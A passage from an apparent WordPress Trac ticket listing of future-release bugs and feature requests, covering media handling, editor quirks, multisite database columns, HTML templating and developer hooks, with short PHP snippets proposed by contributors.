wp_2_options the changes don't save. We're running a secure environment and need Siteurl to be HTTPS instead of HTTP. Changing all the parameters to https and clicking Update doesn't save the changes." firmdot Future Releases 59638 Images: repeating a single image causes `fetchpriority` to be repeated Media normal normal 6.6 defect (bug) new dev-feedback 2023-10-16T20:02:35Z 2024-02-17T13:41:06Z "I noticed a small bug in how core auto-applies the `fetchpriority=""high""` attribute. This feature aims to add this attribute only to the LCP image, which is frequently the first large image in a layout. The bug is this: if a user inserts a single image several times, every instance of the image will have the `fetchpriority=""high""` attribute. === Steps to reproduce 1. create a new post 2. insert a large image at the top of the post 3. Insert the image several more times, so the post now contains several copies of the image. 4. save and view the post source code **Expected result:** The first large image contains the `fetchpriority=""high""` attribute. **Actual results:** Each copy of the image contains the `fetchpriority=""high""` attribute. === Notes I am posting this here because it feels like a bug, even though I'm not sure we should fix it: - The image URL for each item is the same so there may be zero impact to repeating the attribute (the same URL is prioritized). Unless there is a case where the actually fetched image from the srcset could be different for two copies of the same image? - There could be a slight negative performance impact when fixing this since the repetition is the result of an optimization where we only consider each unique image once." adamsilverstein Future Releases 48919 Images wont upload with new Big Images fiunctionality Media 5.3 normal normal Awaiting Review defect (bug) new dev-feedback 2019-12-09T15:20:52Z 2020-05-22T04:14:34Z "With version 5.3 came a new ability to create a big optimized image if the client uploads a very large image. This sort of replaces the full image, although it seems to retain the original image on the server. (not sure why but thats another issue...?) Seen here: https://make.wordpress.org/core/2019/10/09/introducing-handling-of-big-images-in-wordpress-5-3/ Unfortunately there seems to be some bugs. Clients can no longer upload files. They get an error: ""Post-processing of the image failed. If this is a photo or a large image, please scale it down to 2500 pixels and upload it again."" The images uploaded are over 2500, but under 2MB. I tried setting this new functionality to false using the hook I keep finding online: {{{ add_filter( 'big_image_size_threshold', '__return_false' ); }}} This did not work. I tried returning a new size over 2500 and it still wont work. Is this a bug or am I and everyone on the internet using this hook wrong? Thank you. " shamai Future Releases 45782 Images in blocks auto left align when centre align selected Editor 5.0.2 normal normal Awaiting Review defect (bug) new close 2018-12-27T22:25:43Z 2021-07-27T20:08:20Z When using Gutenberg block editor, images are automatically left aligning in preview and publish mode although in edit mode images are centre aligned. Confirmed in CSS code too. lifeadventurers Future Releases 33017 Images displayed with page.php instead of index.php Themes normal normal defect (bug) reopened needs-unit-tests 2015-07-16T15:04:19Z 2019-06-04T21:15:50Z "I am developing a theme and currently do not have an `attachment.php` or a `single.php`. When I insert an unattached image into a post and select ""Link to: Attachment Page"", I expect the image to be displayed with `index.php` according to the template hierarchy [https://developer.wordpress.org/files/2014/10/wp-template-hierarchy.jpg]. However, the attachment page is displayed with the `page.php` tempalte instead, and the URL is under my static front page. The issue does not show up with images attached to the post." creon Future Releases 50061 Image_meta original_image as valid image_size antpb* Media 5.3 normal normal Future Release enhancement accepted dev-feedback 2020-05-02T23:31:58Z 2022-04-12T05:57:58Z "Since the introduction of the ""Big Image Threshold"" in Version 5.3 it is no longer possible to get the width and height of the original image. The name of the original file is stored as string in the image metadata (tested with wp_get_attachment_metadata) and functions {{{ wp_get_original_image_path }}} and {{{ wp_get_original_image_url }}} will only provide the path and url of the original image. It would be more developer friendly to implement it as a valid image size in the ""sizes"" array with name ""original"" or similar. This way functions like wp_get_attachment_image_src could be used to get extended original image information, without breaking existing configurations." tomcent Future Releases 21221 Image title and alt attribute content should be texturized. Media 3.4.1 normal normal enhancement new dev-feedback 2012-07-11T19:49:18Z 2019-06-04T20:03:28Z " gallery_shortcode() texturizes the caption shown underneath images in galleries. For consistency, alt and title tags content should also be texturized. This is also valuable for developers extending the gallery shortcode or output, such as with the WordPress.com (and Jetpack) [http://en.blog.wordpress.com/2011/11/08/new-photo-carousel/ Gallery Carousel feature], as it provides i18n'd texturization, for EG. See attached patch, which: * uses wptexturize() in wp_get_attachment_image() directly (/wp-includes/media.php), which makes it work with gallries, attachment pages, etc. * also uses wptexturize() in get_image_tag() (/wp-includes/media.php), for consistency. * uses wptexturize() in wp_get_attachment_link() (/wp-includespost-template.php), for consistency" stephdau Future Releases 13425 Image Gallery of Private Post is publicly displayed Gallery 3.0 normal normal defect (bug) reopened dev-feedback 2010-05-17T20:12:20Z 2019-06-04T19:42:59Z "Might have been forgotten only, I just ran over this inconsistency while beta-testing: '''Description:''' The Image Gallery of a Private Post is displayed (in another post via the Shorttag with id parameter) whereas, when clicking on the images to go to the attachment page, you get a 404 not found. '''Example:''' [http://hakre.wordpress.com/2010/05/17/cui-utils-rev2/#more-1184 Post with Gallery][[BR]] [http://hakre.wordpress.com/2010/05/17/cui-utils-gnu-tools-fur-windows-32-with-a-simple-setup/gnu-win-cui-util-00-setup/ Attachment of that Gallery] '''Steps to reproduce''' Create a new Post, set a title and the Status to private. Save as Draft. Preview it, to get the ID easily from URL. Upload a Bunch of Images. Insert the Gallery Shorttag inside that Post Body. Publish the Post. Create a second new Post Give it a Title and Insert the Gallery Shortcode with the ID from the last Post. Publish. View. Copy the URL. Open another Browser so to have a new User-Session. Visit that URL. '''Expected Behaviour''' You should not see a gallery. '''Behaviour''' You see a gallery. When clicking on a gallery link you get a 404 page. '''Feedback''' I see an inconsitency here but have no Idea how to deal with it. So either the gallery should not be found as well (not found as in 404 but in this case: not output) or the attachment pages should be able to call as well. Related: #11697" hakre Future Releases 43668 Image cropping fails for many PHP locales, if set Media normal normal Awaiting Review defect (bug) new dev-feedback 2018-03-30T16:12:10Z 2022-03-24T05:15:44Z "If{{{#!php <?php setlocale( LC_NUMERIC /*or LC_ALL */, 'nb_NO' ); }}} is used then Media image cropping fails and selection input fields show `Infinity`. It works fine with 'en_US', btw. If #17268 is implemented, I guess it includes use of `setlocale'. Anyway, image cropping, and other internal passing of numeric data insede an application, should work independently of how numbers are to displayed according to a locale. I don't know which file or script to look into, to suggest a patch. Any help appreciated." knutsp Future Releases 18035 ignore_sticky_posts fails to remove sticky class johneckman Query 3.2 normal normal Future Release enhancement reopened dev-feedback 2011-07-08T10:03:44Z 2023-09-20T03:13:41Z "When setting the query_posts parameter: ignore_sticky_posts = 1 all sticky posts are returned as normal posts and placed accordingly in the flow. However the sticky posts keep their sticky class, which means that an additional filtering of post_class is necessary to avoid any css rules defined for the .sticky selector taking effect. is this intended, or could it be considered an enhancement if it was patched? " mikkelbreum Future Releases 45143 "If the ""recover password"" form submit button is double-clicked two emails will be sent" Login and Registration normal minor Awaiting Review enhancement new dev-feedback 2018-10-22T08:44:48Z 2019-03-18T12:11:56Z "Some users tend to double-click all buttons and links. On the password recovery form (/wp-login.php?action=lostpassword) when the submit button is double-clicked, two emails will be sent. At this point the user is confused about which link to use to recover the password and fails finishing the recovery. It would be good for the submit button to have a time limit or some other means to prevent a double-click from happening." Tiia Rantanen Future Releases 52921 If page content blank and any page shows 404 error Query normal normal Awaiting Review defect (bug) new dev-feedback 2021-03-26T10:53:11Z 2021-03-30T01:31:53Z "If not add any content in the page default content area from the admin panel and save the page and then view the page it shows 404page not found. If add any content in the content area and save then view the page, it's working fine. https://ngatiwhatuaorakei.com/ " ujjwalghosh Future Releases 30798 Ideas for improvements to to wp_die() usages General normal normal enhancement new dev-feedback 2014-12-20T19:34:16Z 2019-06-04T19:47:06Z "When a visitor to or a user of a WordPress powered site encounters a `wp_die()` message (traditionally handled by the `_default_wp_die_handler()` function) it is (likely intentionally) a very jarring experience. Having `wp_die()` produce human readable results is the least amount of assistance we could possibly provide when a not-completely-unanticipated event occurs, and I think in many instances we can provide a more positive experience. Of our current 230 approximate usages, 33 appear to be `Cheatin’; uh?`'s which, while cute and full of personality, aren't particularly helpful to the innocent user who encounters them, nor are they stern enough to deflect any guilty parties from continuing to seek out unauthorized access. The remaining 200 approximate usages typically drop an authorized user into a limbo state where their only option is going back in their browser history and hope their drafted content isn't bungled or lost. Maybe tucking some of these requests behind ajax actions would reduce that redirection? Or maybe enabling themes to have a template hierarchy for handling various error messages would be more user friendly? I don't have a real improvement plan, and don't feel wholly qualified to solve this issue for the entire WordPress community, rather I'm hoping this ticket can foster some discussion about improving this trusted, though somewhat antiquated, piece of WordPress core." johnjamesjacoby Future Releases 39641 "Idea: Move ""Updates"" from ""Dashboard"" to ""Tools""" Upgrade/Install normal normal Awaiting Review enhancement new dev-feedback 2017-01-19T17:15:05Z 2017-01-20T19:59:15Z "When plugin/theme/core updates are available, a new submenu gets added to `wp-admin` for ""Updates."" IIRC, this location was picked because for a few reasons: * Updates are important, so put them towards the top * There is no ""Notification Center"" so this is the next best place * This is the site communicating to the user, so ""Dashboard"" has a logical association Revisiting this, having had this show up for myself recently, ""Dashboard"" suddenly felt... off... * Updating software in other large projects is actually a bigger deal, with dedicated top-level sections for managing it all * WordPress is logically progressing towards software updates being as invisible to the user as comfortably makes sense * ""Dashboard"" shouldn't be a dumping ground for ""this has no other home"" type pages * A ""Notification Center"" for individual users exponentially complicates how this interface works. Do ""global"" notifications exist? Does clearing it for one user clear it for all users? How do we re-check, without user-transients? Obviously, all of this is premature for this idea anyways... So, this got me thinking about our other ambiguously named top-level-menu item: ""Tools"" * Upgrades and updates are technically tools being ran with a mostly-acceptable interface on top of them * The ""Available Tools"" page is a pretty lonely place to be * Plugins already have started putting their own tools in that tools menu, so why not core? I'll attach a screenshot of a relocated submenu to help visualize, and please feel free to close this issue if the notion is premature or silly or whatever." johnjamesjacoby Future Releases 40418 ID columns in multisite database tables should be unsigned flixos90 Database 3.0 normal major Awaiting Review defect (bug) assigned dev-feedback 2017-04-12T02:00:28Z 2018-09-11T16:06:41Z "See #8751 for ye'olde single-site effort to normalize the respective object ID columns. All multisite ID columns are `bigint(20)`, but none of them are `unsigned` which has 2 unintended consequences: * Negative numbers can be stored as values instead of being set to `0` * Maximum int of `9223372036854775807` instead of intended `18446744073709551615` Changes are necessary to every multisite database table, as they all touch site or network IDs. Patch imminent" johnjamesjacoby Future Releases 60766 i have faching this error how can i fix this General 6.4.3 normal major Awaiting Review defect (bug) new close 2024-03-13T07:32:45Z 2024-03-13T16:08:17Z " `Warning: require(C:\xampp\htdocs\Nieuprawny/wp-includes/sodium_compat/autoload.php): Failed to open stream: No such file or directory in C:\xampp\htdocs\Nieuprawny\wp-includes\compat.php on line 338` `Fatal error: Uncaught Error: Failed opening required 'C:\xampp\htdocs\Nieuprawny/wp-includes/sodium_compat/autoload.php' (include_path='C:\xampp\php\PEAR') in C:\xampp\htdocs\Nieuprawny\wp-includes\compat.php:338 Stack trace: #0 C:\xampp\htdocs\Nieuprawny\wp-settings.php(34): require() #1 C:\xampp\htdocs\Nieuprawny\wp-config.php(96): require_once('C:\\xampp\\htdocs...') #2 C:\xampp\htdocs\Nieuprawny\wp-load.php(50): require_once('C:\\xampp\\htdocs...') #3 C:\xampp\htdocs\Nieuprawny\wp-blog-header.php(13): require_once('C:\\xampp\\htdocs...') #4 C:\xampp\htdocs\Nieuprawny\index.php(17): require('C:\\xampp\\htdocs...') #5 {main} thrown in C:\xampp\htdocs\Nieuprawny\wp-includes\compat.php on line 338`" rajgt1 Future Releases 39043 HTTP API :: Its Not Possible To Send Data In Body For GET Requests rmccue HTTP API 4.7 normal normal Future Release enhancement assigned dev-feedback 2016-12-04T03:59:27Z 2017-10-02T11:28:09Z "Currently there is no way to send data in the body of GET requests using the HTTP API (it gets sent as query args instead). While it may not be a very common use-case, its a valid one nevertheless. I've stumbled upon this while writing an integration for a [https://apidocs.sendinblue.com/list/#1 3rd-party API] which does not accept data as query args like most APIs typically do. #37456 is relevant to this issue. Patch incoming..." lots.0.logs Future Releases 57343 HTML in comments is automatically deleted Comments 6.1.1 normal major Awaiting Review defect (bug) new dev-feedback 2022-12-16T16:26:22Z 2023-02-09T11:38:05Z If I add a photo, or a class for a link, or something else, they're immediately removed when I save them. locksoft Future Releases 2691 HTML comments in posts aren't handled properly. adamsilverstein* Formatting 2.8.5 normal normal Future Release defect (bug) accepted needs-unit-tests 2006-04-25T03:16:37Z 2024-01-10T10:11:05Z "When an HTML comment is added in a post, autop adds paragraph ( <p> ) tags around the comment and for multi-line comments line breaks ( <br /> ) are added after every line. This should not happen in HTML comments. This ticket is similar to #712 which was closed with wontfix. I would like to know why this isn't seen as an issue? It prevents the addition of RDF and other metadata, not to mention just plain old HTML comments in posts." gord Future Releases 47976 HTML attributes in uppercase show error in widgets Widgets 4.9 normal normal Awaiting Review defect (bug) reopened dev-feedback 2019-09-05T04:43:40Z 2022-10-18T08:29:01Z "'''[=#point1 (1)] How to reproduce''' go to p-admin/widgets.php and add custom HTML. in custom html box if i add this html, it will error. `<div id=""abcd"" DATA-HREF=""xerjss""></div>` '''[=#point1 (2)] Error -''' the attribute name of [ ""DATA-HREF"" ] must be in lowercase. '''[=#point1 (3)] Why need this''' some ad providers (such as flipkart) supply code where attributes are uppercase." sudhir600 Future Releases 60229 HTML API: Introduce HTML Templating HTML API trunk normal normal enhancement new dev-feedback 2024-01-11T03:41:51Z 2024-03-07T17:03:47Z "WordPress relies on developers remembering to perform proper escaping when building HTML strings. There's no mechanism to ensure that output HTML is safe. This patch introduces `WP_HTML_Template::render( $template, $args )` to do just that. {{{#!php <?php echo WP_HTML_Template::render( <<<HTML <a href=""</%url>""> <img src=""</%url>""> </%url> </a> HTML, array( 'url' => 'https://s.wp.com/i/atat.png?w=640&h=480&alt=""atat>atst""' ), ); }}} outputs {{{ <a href=""https://s.wp.com/i/atat.png?w=640&h=480&alt="atat>atst"""> <img src=""https://s.wp.com/i/atat.png?w=640&h=480&alt="atat>atst"""> https://s.wp.com/i/atat.png?w=640&h=480&alt="atat>atst" </a> }}} This proposed templating syntax uses closing tags containing invalid tag names, so-called ""funky comments,"" as placeholders, because they are converted to HTML comments in the DOM and because there is near universal existing support for them in all browsers, and because the syntax cannot be nested. The `%` at the front indicates that the value for the placeholder should come from the args array with a key named according to what follows the `%`. This proposal does not yet consider nested HTML, or ""raw"" HTML. It currently escapes all content. It would be great if the templating engine can properly and safely handle HTML passed into it without risking unintentional exposure, but there must also be some way to communicate that a value inside is already escaped //and that its safety is maintained//. By relying on the HTML API, this templating only supports replacement of values //inside// HTML attributes or in plaintext (`#text`) nodes. It's not possible to inject HTML tags (unless nested support can be safely added), comments, or other HTML syntax." dmsnell Future Releases 51040 How about having a native BR to Newline method, i.e. br2nl Formatting normal normal Awaiting Review feature request new dev-feedback 2020-08-17T09:54:59Z 2023-12-14T20:35:11Z "Is there a specific reason that WordPress does not have yet (?) a function to convert Line break (`<Br />`) to Newline (`\n`)? This is useful for `textarea` fields. One of the use cases could be a multiline address used as metadata in the user profile. In the `textarea` user enters like: {{{ Building name <Return> Street address <Return> Postal code. Country name }}} When saved we usually convert all line breaks into HTML line breaks for easier rendering in the front-end. We do this using `nl2br` method. So in the database, the above becomes: {{{ Building name <br /> Street address <br /> Postal code. Country name }}} However, when the above information is populated in edit mode, it comes up like {{{ Building name <br /> Street address <br /> Postal code. Country name. }}} A `br2nl` method will make life much easier. {{{#!php <?php /** * @param string $input_string * Converts HTML line break (<br />) into newline character (\n) * * @return null|string|string[] * Since 5.5 */ function br2nl( $input_string ) { return preg_replace('/<br\s?\/?>/ius', ""\n"", str_replace( ""\n"", """", str_replace( ""\r"", """", htmlspecialchars_decode( $input_string ) ) ) ); } }}} " subrataemfluence Future Releases 41663 Hooks for the back to login link in the footer of wp-login.php Login and Registration 4.8.1 normal normal Awaiting Review feature request new dev-feedback 2017-08-17T18:58:25Z 2021-07-20T15:59:58Z "In the following pull request: [https://github.com/WordPress/WordPress/pull/306/files] I introduced 3 new filters to the login footer area. With these filters you can customize the back to login link to your needs. " Fleuv Future Releases 28774 Hooking into wp_ajax_upload_attachment General 4.0 normal normal enhancement new dev-feedback 2014-07-07T15:20:25Z 2019-06-04T19:46:04Z "If you want to do something before/after an attachment has been uploaded - or replace the upload function entirely -- there doesn't seem to be a way to do that: For other `wp_ajax_* calls`, you can unhook them and then hook in your own. This doesn't work for `wp_ajax_upload_attachment` because it ends up getting called directly from async-upload.php. If we replace the direct call with another set of `do_action/add_action` (like admin-ajax has) you can now hook into upload like the other ajax actions. See the proposed patch." jshreve Future Releases 44042 Hook for ‘delete_option’ behaviour required Options, Meta APIs 1.2 normal normal Future Release enhancement new dev-feedback 2018-05-11T07:45:45Z 2022-06-02T13:51:37Z "Hi, I posted this about one month ago in the wordpress support forum: [https://wordpress.org/support/topic/hook-for-delete_option-behaviour-required/] I did not receive any answers there but referred to this forum, so I post it here again:\\ Hi, I would need to prevent and change the deletion of certain options by the WP core function ‘delete_option’. There is a hook {{{ do_action( 'delete_option', $option ); }}} available here: [https://core.trac.wordpress.org/browser/tags/4.9.4/src/wp-includes/option.php#L532]\\ But this does neither provide a way to exit the delete_option function before the option is deleted nor to change the option name to be deleted. In fact this existing hook seems to be pretty useless. Therefore I would need a filter in the first line of the delete_option core function like {{{ $option = apply_filters( 'delete_option_name', $option ); }}} . Or change the line 535 from {{{ $option = trim( $option ); }}} to {{{ $option = trim( apply_filters( 'delete_option_name', $option )); }}} Any chances to get this into core immediately?\\ Thx, Robert " RobertoDonPedro Future Releases 44094 Hook for WP_User data hydration to enable strong data security SergeyBiryukov Users normal normal Awaiting Review enhancement reviewing dev-feedback 2018-05-15T17:54:31Z 2019-08-27T18:30:21Z "Hi there! I'm one of the founders of Crypteron, a data-security platform for developers. I'm also active in the WordPress community, an organizer of the [San Diego Advanced WordPress Meetup](https://www.meetup.com/Advanced-WordPress), an admin of the [Advanced WordPress Facebook Group](https://www.facebook.com/groups/advancedwp) (with over 30,000 members) and a past speaker and organizer at WordCamp San Diego. For the past 8 months I've been working on a free plugin called **EncryptWP** that brings military-grade data-security to WordPress. It automatically encrypts and decrypts sensitive user data such as names, email addresses and physical addresses and even supports secure, searchable encryption. It's been a labor of love and is available for beta testing at https://github.com/crypteron/encryptwp. The reason I'm posting a ticket here is that I've had to resort to a non-ideal approach to automatic decryption of native (non-meta) user fields within WordPress. Ideally I would decrypt sensitive user data right after it's loaded from the database as it is hydrated into the `WP_User` object. Unfortunately, no hook is fired during this process. I strongly believe that one should be. Instead, I decrypt native user fields using a combination of the filters: `edit_user_{{$field}}`, `{{user_{{$field}}`, `the_author`, and `wp_dropdown_users`. This approach works but has some major downsides: * The `edit_user_{{$field}}` and `user_{{$field}}` filters are only fired when `$user->filter` is truthy (See line 308 of `class-wp-user.php`). I do my best to ensure that this value is set, but plenty of plugins interact with `WP_User` objects without setting their `filter` property. This results in some plugins outputing encrypted text for fields such as `display_name`. * The `edit_user_{{$field}}` and `user_{{$field}}` filters are fired in the `sanitize_user_field` method which, fundamentally, is not a logical place for this sort of operation. * Some native WordPress code bypasses the `sanitize_user_field` method so I've had to add additional filters for `the_author` and `wp_dropdown_users` (using a RegEx!) * Rather than decrypting all sensitive data once, I have to decrypt it every time it is fetched which is inefficient. Despite all of this, EncryptWP works very well. I think the plugin can be a game-changer for WordPress, making HIPAA compliant WordPress sites possible not to mention the new world of GDPR compliance. We have an ambitious, technical road map for the plugin including extending it to handle user-defined meta keys, encrypting `wp_post` and `wp_options` data, key management, and more. But I'd really love to get it 100% compatible and performant with all plugins and, in order to do that, we really need a `WP_User` hydration filter. Such a filter could benefit many other plugins as well and is guaranteed to be backward compatible with all other sites since it would not change existing behavior. I would envision that the filter could be added within the [WP_User->init](https://github.com/WordPress/WordPress/blob/master/wp-includes/class-wp-user.php#L170) method: {{{#!php <?php public function init( $data, $site_id = '' ) { $this->data = apply_filters('init_user_data', $data, $site_id); $this->ID = (int) $data->ID; $this->for_site( $site_id ); } }}} Please let me know your thoughts on adding this new filter. One line of code can make all the difference! " yguez Future Releases 36323 home_url returns url with wrong scheme Permalinks 4.4.2 normal normal defect (bug) new dev-feedback 2016-03-25T02:40:21Z 2019-06-04T20:56:21Z "Hello, I have a multisite with HTTPS on all subsites. When using {{{ home_url( '/' ); }}} , on a subsite page, logged in user got a https url, when anonymous got just http. In the track, it seems that the error comes from those lines... {{{#!php 2963 if ( ! in_array( $scheme, array( 'http', 'https', 'relative' ) ) ) { 2964 if ( is_ssl() && ! is_admin() && 'wp-login.php' !== $pagenow ) 2965 $scheme = 'https'; 2966 else 2967 $scheme = parse_url( $url, PHP_URL_SCHEME ); 2968 } }}} ... Thank you for your time." Gerkin Future Releases 50361 Highlight if link targets in comments don't refer to the link text Comments normal normal Awaiting Review enhancement new dev-feedback 2020-06-10T20:36:48Z 2020-06-10T20:42:02Z I'm thinking of some kind of solution to warn if links in comments are not what they seem to be to give a little security extra. They can be misused to inject bad stuff if clicked as an admin. I changed class-wp-comments-list-table.php to show a hint like on the screenshot to show you what I mean. What do you think? How could this be done in a non disturbing way? Or don't we want it at all? You decide. Presskopp Future Releases 50158 Hide columns in the list of posts for user levels Administration 5.4.1 normal normal Awaiting Review feature request assigned dev-feedback 2020-05-13T21:11:14Z 2020-05-14T15:47:40Z "On the page all posts, columns of information are shown (Titles, Author, Categories, Tags, ...). And there may be some columns that we don't want to show to all user levels, for example on my website I have installed the “Search Exclude” plugin and they insert a column in the list of posts to inform whether each post is hidden or visible, https://prnt.sc/sab4vw But, this column is not required to be shown to users who are not Administrators or even Editor levels. So, I would like to hide this column for Author, Contributor, Subscriber and ect levels. But the plugin does not offer this option, and with that I have no option to hide. The WP has the “Screen options” feature where each user can hide certain columns. However, this feature applies individually to each user, that is, each user hides the column only for him. And what I wanted, as a site administrator, is to have the control to hide columns for all levels of users and to control which levels of users I want. In fact, I, as an administrator, could even have the control to hide columns for certain users (I select the column I want to hide and then select the users to whom that column should be hidden). WP does not offer this feature. So I would like to leave this suggestion to the development staff. Thank you! Rodrigo Carlos" vejapixel Future Releases 55616 Helper function to unhook anonymous class methods Plugins normal normal Awaiting Review defect (bug) new dev-feedback 2022-04-25T13:12:13Z 2022-05-13T08:50:06Z "Problem: it’s pretty common (even if it’s not polite) for plugins to use a class constructor to hook their own public methods into things, but doing so makes it ''near-impossible'' to unhook procedurally. Solution: I just ran across the following function on StackExchange, and imagined something similar could be quite useful to have globally available: https://wordpress.stackexchange.com/a/304861 It’s gnarly, but it works, and I think having WordPress core include this functionality makes more sense than having plugin authors all include their own version of it." johnjamesjacoby Future Releases 22251 Helper function to simplify checking for constants Bootstrap/Load normal normal Future Release enhancement new dev-feedback 2012-10-22T00:32:27Z 2018-05-31T23:46:31Z "Love 'em or hate 'em, WordPress uses lots of constants. As a result, this pattern is all over core and plugins, and occasionally themes: `if ( defined( 'CONSTANT_NAME' ) && CONSTANT_NAME )` Right now on trunk, it's used 57 times (excluding 2 in Akismet). {{{ ~/code/wptrunk $ ack ""defined\( ?('|\"")([^'\""]+)\1 ?\) \&\& \2"" -h --ignore-dir=wp-content/plugins/ | wc -l 57 }}} How about a new function to make that verbose logic a little bit less repetitive. {{{ function wp_constant( $constant ) { return defined( $constant ) && constant( $constant ); } }}}" evansolomon Future Releases 57672 Help: only repo plugins and such can be updated on the help page? Help/About normal minor Awaiting Review enhancement new dev-feedback 2023-02-08T13:55:14Z 2023-03-12T18:27:57Z "If you look at this string: https://translate.wordpress.org/projects/wp/dev/admin/nl-be/default/?filters%5Bstatus%5D=either&filters%5Boriginal_id%5D=76683&filters%5Btranslation_id%5D=99106010 if you read it literally, it looks like you can only get auto updates from items from the repo here on wp.org. Yet, there are premium plugins and theme's which can do this as well. Is this something were we should change the phrasing of this?" NekoJonez Future Releases 44968 Header Text color option doing two jobs, so both suffer Customize normal normal Awaiting Review defect (bug) new dev-feedback 2018-09-19T20:39:00Z 2020-11-04T06:09:37Z "There are two issues, both of which have been addressed before. #23761, #22498 The Header Text color option and the Display Site Title and Tagline option use the same storage space (theme_mod), so there is no way to hide the title and use the color for other header text, and when the title is unhidden the color is (sort of) the default. Steps to reproduce: 1. In Customizer, note the header text color for comparison later. 2. Hide the site title. 3. Save and exit the Customizer. 4. Open Customizer and unhide the site title. 5. Look at the header text color and compare to value from step 1. What I expect: 1. The header text color could be used for other header text besides the site title. Hiding the title should not hide the color selection. 2. The color set before the title was hidden should be restored when the title is unhidden. What actually happens: 1. The color option is used to indicate the visibility of the site title, so the color is set to 'blank'. 2. Other text in the header cannot be styled with the header text color if the site title is hidden. 3. When the site title is unhidden, the header text color option shows a color for the swatch that is the default color, but the text input box is empty and the color indicator shows black (as if it were 0). Or just set the color of the header text, hide it, unhide it, and the color you chose is gone. I think it should be two separate options for color and hiding. I don't know how that would affect backward compatibility, but it is the best solution." joyously Future Releases 57597 Have a button to copy permalinks on the post & page overview Posts, Post Types normal normal Awaiting Review enhancement new close 2023-02-01T08:31:00Z 2023-02-02T06:50:31Z "I think it would be quite handy if in the post & page overviews, there is a button to copy to the link to that page/post in the quick links. So, you don't have to go to the page OR have to open the editor to copy the permalink. This would especially be handy if you work with hidden pages." NekoJonez Future Releases 57476 hash characters at start of wp post titles are stripped upon pasting General 6.1.1 normal normal Awaiting Review defect (bug) new dev-feedback 2023-01-16T22:28:24Z 2023-02-02T13:14:54Z "There is a bug in the latest version of WP 6.1.1. When I paste a wordpress post title that has a # pound hash character as the first character, that character is stripped from the title upon pasting." robinbrinkler Future Releases 50548 Gutenberg default style not work Editor 5.4.2 normal normal Awaiting Review defect (bug) new dev-feedback 2020-07-03T10:46:23Z 2020-07-04T04:24:09Z "Hello, I found the Gutenberg default style dropdown not work. Please check the attached document. Thanks. " rkradadiya Future Releases 58508 Gutenberg and CSS Editor 6.2.2 normal normal Awaiting Review defect (bug) new dev-feedback 2023-06-11T00:20:52Z 2023-06-11T00:20:52Z "ENGLISH Hello. I created a page, but when I deleted a photo from the gallery, all the content was deleted. Going to the revisions I was able to restore the content, but when updating, everything is deleted again. I changed the version from PHP8.0 to 8.1 but still the same. I deactivated the plugins and the error was repeated. Finally, with all these changes, I restored the page revision that has all the content, but I added a full stop to some text, I UPDATED and the content was no longer deleted. I activated all the plugins and the error returned. I started to disable GUTENBERG first, restored the revision without making changes to it, saved the page and it works fine. PS: I had to change from PHP8.1 to 8.0 because it throws errors in the Backend (css is disabled, still changing themes) THEME: ASTRA WP: 6.2.2 PHP at startup: 8.1 PHP at the end: 8.0 ---- ESPAÑOL Hola. He creado una página, pero al borrar una foto de la galería, se borró todo el contenido. Yendo a la revisiones pude restaurar el contenido, pero al actualizar, vuelve a borrarse todo. Cambié la versión de PHP8.0 a 8.1 pero seguía igual. Desactivé los plugins y el error se repetía. Por último, con todo estos cambios, restauré la revisión de página que tiene todo el contenido, pero le agregué un punto final a un texto, ACTUALICÉ y ya no se borró más el contenido. Activé todos los plugins y volvió el error. Empecé a desactivar primero GUTENBERG, restauré la revisión sin hacerle cambios, guardé la página y funciona bien. PD: Tuve que cambiar de PHP8.1 a 8.0 porque arroja errores en el Backend (se desactiva el css, aún cambiando de temas) TEMA: ASTRA WP: 6.2.2 PHP al inicio: 8.1 PHP al final: 8.0 " aiteok Future Releases 45861 Global variable in plugin main file Plugins normal normal Awaiting Review defect (bug) new dev-feedback 2019-01-08T10:51:14Z 2019-01-09T06:59:04Z "In the main plugin file, if we declare a variable, it will be used as a global variable in WordPress. This might lead to conflict for global variable names. The code is in [https://core.trac.wordpress.org/browser/trunk/src/wp-settings.php#L342 wp-settings.php] file. A simple fix is creating a function to load a plugin and include main plugin file inside that function. So the scope is function scope, not global scope." rilwis Future Releases 60131 Global styles controllers: extend classes with WP_REST_Posts_Controller and WP_REST_Revisions_Controller spacedmonkey REST API 6.3 normal normal 6.6 enhancement reopened dev-feedback 2023-12-22T03:28:13Z 2024-02-26T20:18:16Z "As part of the efforts to improve the maintainability of Global Styles REST controllers, and to remove a lot of duplicate code we can: - extend `WP_REST_Global_Styles_Controller` with `WP_REST_Posts_Controller`. - extend `WP_REST_Global_Styles_Revisions_Controller` with `WP_REST_Revisions_Controller`. The Global styles REST response has the following characteristics: - Doesn't return excerpt, content, guid fields - Does some JSON parsing when preparing the response In other words, the functionality was ""special"" enough not to warrant extending the base controller instead of using WP_REST_Posts_Controller. Also, global styles were new and evolving. For revisions especially, more code was required to override the parent class's functions, and having a stand alone class left more elbow room for subsequent tweaks and changes. Now that global styles have ""settled"" however, and shares more methods with `WP_REST_Posts_Controller` and `WP_REST_Revisions_Controller`, it makes sense to change the base classes for more consistent interface, less code and less maintenance burden. See discussion and related PRs: - [https://github.com/WordPress/gutenberg/pull/55827#discussion_r1399856581 WordPress/gutenberg#55827 (comment)] - [https://github.com/WordPress/gutenberg/pull/49974 Rest API: add /revisions endpoint for global styles] - [https://github.com/WordPress/gutenberg/pull/35801 Add a Global Styles endpoint and use it in the site editor] " ramonopoly Future Releases 49912 Global setting to show tag content in ascending/chronological order Taxonomy 5.5 normal normal Awaiting Review feature request new dev-feedback 2020-04-15T17:55:30Z 2020-08-26T19:49:18Z "WordPress tags can be used to group content together into small groups that are very good at showing the history of a topic and how it evolved over time. For example, you could use a tag to group together a 10 part series of articles that all belong to a category shared with other topics, and use that tag to allow a visitor to see all of those topics at once. Unfortunately, because WordPress defaults showing content with the most recent content first (descending order), it requires the user to scroll down to the bottom of a list in order to go through that content chronologically. There are plugins that allow you view categories in ascending (chronological) order, but they don't extend to tags. And you can add ?order=asc to any individual tag link to switch the order, but there's no built-in way to make this default behavior. Having a radio button that, when checked, would append ""?order=asc"" to the end of any tag link would allow the site owner to show all tags chronologically, allowing them to be used as mini-archives within a category. Also adding it to the individual tag pages would further allow the site owner to set specific tags as chronological and others as ""standard,"" depending on need. This could also be added to categories, though there are plugins out there that already do this." cbwright Future Releases 59410 Getting waring related Warning: array_flip() expects parameter 1 to be array Administration 6.3.1 normal normal Awaiting Review defect (bug) new close 2023-09-20T09:51:01Z 2023-10-03T11:23:07Z "Hey Core Team, when I am using the switch user plugin and after switching user gets a warning on the top bar more information you can see the mentioned screenshot. For more information see mentioned screenshot. " sumitsingh Future Releases 45670 Getting different MIME type from function finfo_file. Upload 5.0.1 normal normal 